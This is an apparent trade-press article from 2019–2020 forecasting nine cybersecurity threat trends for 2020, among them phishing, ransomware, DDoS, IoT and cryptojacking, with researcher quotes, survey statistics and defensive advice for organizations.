2020 cybersecurity trends: 9 threats to watch

Making cybersecurity predictions is fun, but not necessarily helpful to security professionals who must decide which threats for which they should be the most prepared. “You can’t really make a good prediction about what the future’s going to hold because it’s always the stuff that comes out of left field that really becomes the problem,” says Chad Seaman, senior engineer on Akamai’s security intelligence response team.  

If your biggest threat for 2020 is something new and unpredictable, how can you best focus your efforts in the coming year? Start by looking at how this year’s biggest threats are likely to change in 2020 in terms of scale and tactics.

CSO has reviewed the leading research on the most common, significant threats of 2019 and asked those researchers for their advice on where those threats will trend and how organizations might adjust their defenses against them in 2020. Here’s what we learned.

Malware infections of devices

Protecting endpoints has continued to be a battle for organizations. About half of all organizations suffered a malware infection on company-owned devices in 2019, according to Kaspersky’s IT Security Economics in 2019 report. Half also saw malware infections on employee-owned devices.

For the enterprise, malware infections on company devices was the most expensive incident cited on the Kaspersky report with an average cost per incident of $2.73 million. That number was significantly less for SMBs at $117,000.

What to expect in 2020: Dmitry Galov, security researcher at Kaspersky, sees the risk from employee-owned devices increasing in 2020. He sees a greater willingness for companies to allow employees to use their own devices to cut costs, enable remote work, and increase employee satisfaction. As a result, attackers will target personal devices as a way to bypass corporate defenses. “By default, users’ personal devices tend to be less protected than corporate devices as the average users seldom apply additional measures to protect their phones and computers from potential threats,” he says. “As long as this trend continues, company and employee-owned device infections will arise. This vector of attack remains attractive because the attacker no longer needs to target corporate accounts (for instance, with phishing emails sent to corporate mail).“

Best advice for 2020: Companies must review and update their policies around personal devices, and then enforce those policies, Galov believes. “Strict company policies regarding security, correct rights management and provision of users with security solutions are on the list of must haves to protect the company and its data,” he says. “As well as managing technical issues, security awareness trainings are important because they can cultivate standards of cyber hygiene among employees.”

Phishing

Nearly a third of all breaches in the past year involved phishing, according to the 2019 Verizon Data Breach Investigations Report. For cyber-espionage attacks, that number jumps to 78%. The worst phishing news for 2019 is that its perpetrators are getting much, much better at it thanks to well-produced, off-the-shelf tools and templates.

Akamai’s SOTI Report: Baiting the Hook broke down the phishing-as-a-service offered by one phishing kit developer. This developer has a storefront and advertises on social media. Prices start at $99 and go up depending on the mailing services selected. All the kits come with security and evasion features. “The low prices and top-tier brand targets are attractive, creating a low bar for entry into the phishing market for criminals looking to set up shop,” said the report’s authors. Among those top-tier brands targeted are Target, Google, Microsoft, Apple, Lyft and Walmart.

What to expect in 2020: Phishing kit developers will offer more refined products, further lowering the skill required to launch a phishing campaign. According to the IDG Security Priorities Study, 44% of companies say that increasing their security awareness and staff training priorities is a top priority for 2020. Attackers will respond by improving the quality of their phishing campaigns by minimizing or hiding common signs of a phish. Expect greater use of business email compromise (BEC), too, where an attacker sends legitimate-looking phishing attempts through fraudulent or compromised internal or third-party accounts.

Best advice for 2020: Keep your anti-phishing training up to date and make it ongoing. To combat BEC, have policies in place that require any employee receiving a request regarding money or payment instructions to confirm by phone.

Ransomware attacks

Ransomware attacks are not the most common cybersecurity incident, but they can be among the most costly. Roughly 40% of SMBs and enterprises experienced a ransomware incident in 2019, according to Kaspersky’s IT Security Economics in 2019 report. At the enterprise level, the average cost per incident was $1.46 million.

Endpoint protection tools are getting better at detecting ransomware, but that has made ransomware developers better students of the techniques those tools use, according to the Sophos Labs 2020 Threat Report. “It is a lot easier to change a malware’s appearance than to change its purpose or behavior, which is why modern ransomware relies on obfuscation to be successful,” says Mark Loman, director of engineering for next-generation tech at Sophos. “However, in 2020, ransomware will raise the stakes by changing or adding traits to confuse some anti-ransomware protection.”

Some of that obfuscation is to make the ransomware appear to be from a trusted source. The Sophos reports cites several examples:

• Crafting a script listing targeted machines and incorporating them together with the PsExec utility from Microsoft Sysinternals, a privileged domain account, and the ransomware.
• Leveraging a logon/logoff script via a Windows Group Policy Object
• Abusing the Windows Management Interface to mass distribute inside a network

What to expect in 2020: Loman sees ransomware attackers continuing to tweak their methods to give themselves an edge. “Among the most notable advancements is an increase in ransomware attackers raising the stakes with automated, active attacks that blend human ingenuity with automation tools to cause maximum impact,” he says. “Additionally, by encrypting only a relatively small part of each file or booting the operating system to a diagnostic mode where anti-ransomware protection is often unavailable, attackers will continue to evade most defenses.” 

“Ransomware attacks have been loud this year and there is no reason for this type of threat to decline,” says Kaspersky’s Galov.” Ransomware increasingly targets infrastructure, organizations and even smart cities.”

Ransomware developers will make their code more evasive so that they can establish a foothold in a system, encrypt more data without being noticed, and possibly scale operations to other networks. “This year we saw the appearance of attacks even on Network Attached Storage (NAS), which is largely considered secure and safe from such threats,” says Galov.

Best advice for 2020: As always, the best defense against ransomware is to have current, tested backups of all critical data. Keep those backups isolated from your network so they, too, aren’t encrypted by the ransomware. Employee training is critical, too. “In order to protect themselves from ransomware, organizations need to implement strict security policies and introduce cybersecurity trainings to the employees,” says Galov. “Additional protective measures, such as securing access to data, ensuring its backups are stored securely and implementing application whitelisting techniques on servers, are required.”

“It is vital to have robust security controls, monitoring and response in place covering all endpoints, networks and systems, and to install software updates whenever they are issued,” says Loman.

Third-party supplier risk

Both enterprises and SMBs saw incidents involving third-party suppliers (both services and products) at a similar rate, 43% and 38%, respectively, according to Kaspersky’s IT Security Economics in 2019 report. Most organizations (94%) grant third-party access to their network, according to a survey by One Identity, and 72% grant privileged access. Yet only 22% felt confident those third parties weren’t accessing unauthorized information, while 18% reported a breach due to third-party access.

The Kaspersky study shows that both SMBs and enterprises are forcing third-party suppliers to sign security policy agreements—75% of SMBs and 79% of enterprises use them. That’s making a big difference when it comes to getting compensation from third parties when they are responsible for a breach. Of enterprises with a policy in place, 71% reported they received compensation, while only 22% of companies without a policy received compensation.

What to expect in 2020: Businesses will become more digitally connected with their suppliers and partners. That raises risk as well as awareness of that risk. Unfortunately, attackers are becoming more sophisticated.

“Recently, we’ve observed some new groups such as BARIUM or APT41 engage in sophisticated supply chain attacks against software and hardware manufacturers in order to penetrate secure infrastructures around the world,” says Galov. “These include two sophisticated supply chain attacks uncovered in 2017 and 2019: the CCleaner attack and ShadowPad, and other attacks against gaming companies. Dealing with a compromise from one of these threat actors is a complex process, as they usually leave backdoors allowing them to return later and cause even more havoc.”

Best advice for 2020: Know who has access to your networks and ensure they have only the privileges they need. Have policies in place for communicating and enforcing rules for third-party access. Make sure you have a security policy in place for all your third-party suppliers that spells out responsibilities, security expectations, and what happens when an incident occurs.

“The best organizations can do to protect themselves from such attacks is to make sure that not only they, but also their partners, follow high cybersecurity standards,” says Galov. “If third-party suppliers get any kind of access to internal infrastructure or data, cybersecurity policies should be established before the integration process.

DDoS attacks

Forty-two percent of enterprises and 38% of SMBs experienced a distributed denial of service (DDoS) attack in 2019, according to Kaspersky’s IT Security Economics in 2019 report. That’s on par with ransomware incidents, which get much more media attention. From a financial perspective, DDoS attacks cost SMBs an average of $138,000. 

Attackers continue to innovate to improve the effectiveness of their DDoS attacks. In September, for example, Akamai reported a new DDoS vector: Web Services Dynamic Discovery (WSD), a multicast discovery protocol to locate services on a local network. Using WSD, attackers can locate and compromise misconfigured, internet-connected devices at scale to amplify the scope of their DDoS attacks.

What to expect in 2020: Kasperksy’s Galov sees DDoS attacks staying “quite prominent” in 2020 thanks to the rise of 5G and numbers of IoT devices. “The conventional boundaries of critical infrastructure such as water supply, energy grid, military facilities and financial institutions will expand much further to other unprecedented areas in a 5G-connected world,” he says. “All these will require new standards of safety, and the increased speed of connection will pose new challenges in stopping DDoS attacks from happening.”

Best advice for 2020: Do everyone a favor and check your internet-connected devices for misconfigurations and unpatched vulnerabilities. “It’s security hygiene, basic security hygiene,” says Akamai’s Seaman.

Unfortunately, that won’t help the risk of DDoS attacks aided by connected consumer devices. “Grandma going to Best Buy to pick up a new webcam to put on the driveway so she can see who pulls in isn’t going to know about the hygiene of this device,” says Seaman. “That’s where we continue to see the bigger problems, and it’s not grandma. It’s really some guy in Vietnam who has a VDR security system for his small shop. The last of his concerns is whether his webcam being used to DDoS a bank.”

Application vulnerabilities

According to Veracode’s State of Software Security Vol. 10 report, 83% of the 85,000 applications it tested had at least one security flaw. Many had much more, as their research found a total of 10 million flaws, and 20% of all apps had at least one high-severity flaw. That leaves a lot of opportunity in terms of potential zero-day vulnerabilities and exploitable bugs for attackers to take advantage of.

The report authors see optimism in some of the data. Fix rates, especially for high-severity flaws, are improving. The overall fix rate is 56%, up from 52% in 2018, and the highest severity flaws are fixed at a rate of 75.7%. The biggest positive, however, is that a DevSecOps approach with frequent scanning and testing of software will drive down the time to fix flaws. Median time to repair for applications scanned 12 times or fewer per year was 68 days, while an average scan rate of daily or more lowered that rate to 19 days.

What to expect in 2020: Despite the best efforts of security and development teams, vulnerabilities will continue to creep into software. “Most software today is very insecure. That will continue in 2020, especially with 90% of applications using code from open-source libraries,” says Chris Wysopal, co-founder and CTO at Veracode. “We’ve seen some positive AppSec signs in 2019. Organizations are increasingly focused on not just finding security vulnerabilities, but fixing them, and prioritizing the flaws that put them most at risk…. Our data suggests that finding and fixing vulnerabilities is becoming just as much a part of the process as improving functionality.” Best advice for 2020: As the Veracode research shows, scanning and testing your apps for vulnerabilities more frequently while prioritizing the most severe flaws to be fixed is an effective defense. Wysopal also urges companies to keep an eye on security debt. “One of the growing threats within application security is the notion of security debt – whether applications are accruing or eliminating flaws over time,” he says. A growing security debt leaves organizations exposed to attacks.

“Just as with credit card debt, if you start out with a big balance and only pay for each month’s new spending, you’ll never eliminate the balance,” Wysopal says. “In AppSec, you have to address the new security findings while chipping away at the old.”

Cloud services/hosted infrastructure incidents

Forty-three percent of enterprise businesses had security incidents that affected third-party cloud services in 2019, according to Kaspersky’s IT Security Economics in 2019 report. Although cloud-related incidents didn’t make the SMB most frequent list, they were expensive for smaller companies, which often are more dependent on hosted services. The average incident that affected hosted infrastructure for SMBs was $162,000.

One area that saw an uptick in activity in 2019 was online payment fraud. The Magecart criminal group in particular was quite busy this past year. The group uses code that takes advantage of misconfigurations in the cloud to modify shopping cart code. The businesses using the online ecommerce services are unaware of the change until customers complain of fraudulent charges.

Organizations still need to worry about misconfiguring cloud services in a way that leaves data exposed on the internet. Attackers regularly scan the internet to grab this exposed data. Fortunately, cloud platform vendors such as Amazon and Google have rolled out new tools and services in 2019 to help organizations properly configure their cloud systems and find errors that leave data unprotected.

What to expect in 2020: The staying power of the malicious code and the financial reward (Magecart’s haul alone is estimated to be millions of dollars) means online payment fraud will increase in 2020. Magecart’s success is bound to inspire imitators. Organizations will counter this and other cloud threats by spending more on cloud security. According to the IDG Security Priorities Study, only 27% of organizations have cloud data protection technology in production, but 49% are researching or piloting it.

Best advice for 2020: Conduct source code reviews of your ecommerce scripts and Implement subresource integrity so that modified scripts are not loaded without your permission. Make sure your cloud providers conduct assessments of their own code to prevent fraud. Do regular scans for configuration errors that expose your data on the internet.

IoT vulnerabilities

The internet of things (IoT) and the data it generates was the second most impactful trend on security practitioners in 2019, according to the Security Industry Association (SIA) 2019 Security Megatrends report. The growth of IoT is nothing short of manic and difficult to predict. Research firm Statista estimates there will be between 6.6 billion and 30 billion internet-connected devices in 2020, a range too large to be helpful.

The threat IoT poses has been front of mind in 2019 for most organizations. The Marsh Microsoft 2019 Global Risk Perception Survey found that 66% of respondents saw IoT as a cyber risk; 23% rated that risk “extremely high.” “These IoT devices are soft targets for adversaries because they are often unpatched and misconfigured, and they’re ‘unmanaged’ because they don’t support endpoint security agents,” says Phil Neray, vice president of industrial cybersecurity at CyberX. “As a result, they can easily be compromised by adversaries to gain a foothold in corporate networks, conduct destructive ransomware attacks, steal sensitive intellectual property, and siphon computing resources for DDoS campaigns and cryptojacking.”

CyberX’s 2020 Global IoT/ICS Risk Report breaks down the most common security gaps that make IoT devices vulnerable over the past 12 months. It shows significant improvement in a few areas. Remotely accessible devices dropped 30 percentage points with the vulnerability found on 54% of surveyed sites. Direct internet connections also fell from 40% to 27%.

On the downside, outdated operating systems were found at 71% of the sites versus 53% the previous year, and 66% of the sites failed to do automatic antivirus updates compared to 43% the previous year.

What to expect in 2020: Neray sees the risk from exposed IoT devices increasing in 2020 as the number of connected devices increases and ”the motivation and sophistication of nation-state adversaries and cybercriminals increases.” Industrial environments such as energy utilities, manufacturing, chemicals, pharmaceuticals and oil and gas will especially be at risk, he says. “These compromises can lead to even more serious consequences including costly plant downtime, threats to human safety and environmental incidents.”

Neray identifies building management systems (BMS) as a prime target for attackers. “They’re typically deployed by facilities management teams with minimal expertise in security, often unknowingly exposed to the internet, and typically not monitored by corporate security operations centers (SOCs).” 

Best advice for 2020: Neray advises companies to follow a multi-layered defense-in-depth strategy incorporating

• Stronger network segmentation
• Restricted remote access to industrial control networks by third-party contractors with strong access controls such as 2FA and password vault
• Agentless network security monitoring to rapidly detect and mitigate IoT attacks before adversaries can blow up or shut down their facilities.

Ultimately, the best defense depends more focus on organizational rather than technical approaches. “In the TRITON attack on the safety systems of a petrochemical facility in Saudi Arabia, for example, one of the key deficiencies was that no one considered themselves ultimately responsible for the security of the industrial control network,” says Neray. “As a result, there were serious lapses in security monitoring and no one checked that the firewalls in the DMZ had been properly configured by the outsourced firms that installed them. Our advice for CISOs is to step up to the plate and take ownership of IoT and OT security and treat IoT and OT security in a holistic manner alongside IT security, integrated into your SOC workflows and security stack.

Cryptojacking

Let’s end this list with some good news: Cryptomining attacks are expected to decline in 2020. Although cryptomining attacks did not make the most-frequent list for either enterprises or SMBs on Kaspersky’s IT Security Economics in 2019 report, they proved costly for enterprises in 2019. The average financial impact for them was $1.62 million.

What to expect for 2020: Cryptomining incidences rise or fall with cryptocurrency values, but the ease with which attackers can execute a cryptojacking scheme means this threat will persist through 2020. “Mining has been steadily declining throughout 2019 and we do not see any reason for this tendency to change,” says Galov.” Cryptomining has become less profitable, not without the influence of cryptocurrencies that have taken the fight against this threat.”

Best advice for 2020: Use a security solution that detects cryptomining threats and keep an eye out for spikes in cryptocurrency values, which will encourage more cryptojacking attacks.